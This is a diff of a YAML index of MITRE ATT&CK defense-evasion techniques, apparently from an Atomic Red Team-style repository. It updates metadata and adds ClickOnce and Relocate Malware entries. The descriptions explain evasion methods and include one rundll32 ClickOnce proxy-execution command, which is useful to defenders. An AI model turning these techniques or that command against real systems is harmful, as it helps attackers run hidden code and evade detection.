-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10673,7 +10814,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1027.003:
@@ -10729,11 +10869,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10757,11 +10896,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -10786,9 +10924,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -10868,7 +11005,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -10902,7 +11038,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10929,8 +11065,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests: []
   T1553.004:
@@ -11025,48 +11159,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests: []
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -11075,9 +11185,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -11089,12 +11204,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests: []
   T1564.007:
@@ -11142,7 +11280,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11168,12 +11306,10 @@ defense-evasion:
       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11263,7 +11399,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1127.001:
@@ -11321,12 +11456,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests: []
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -11368,10 +11502,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -11395,18 +11528,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -11420,7 +11565,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
@@ -11432,20 +11577,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -11454,11 +11590,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11467,6 +11602,7 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -11476,6 +11612,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -11487,13 +11624,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -11538,9 +11675,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests:
     - name: AWS - CloudTrail Changes
@@ -11958,18 +12092,140 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests: []
+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -12002,10 +12258,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -12042,40 +12297,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -12084,20 +12309,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
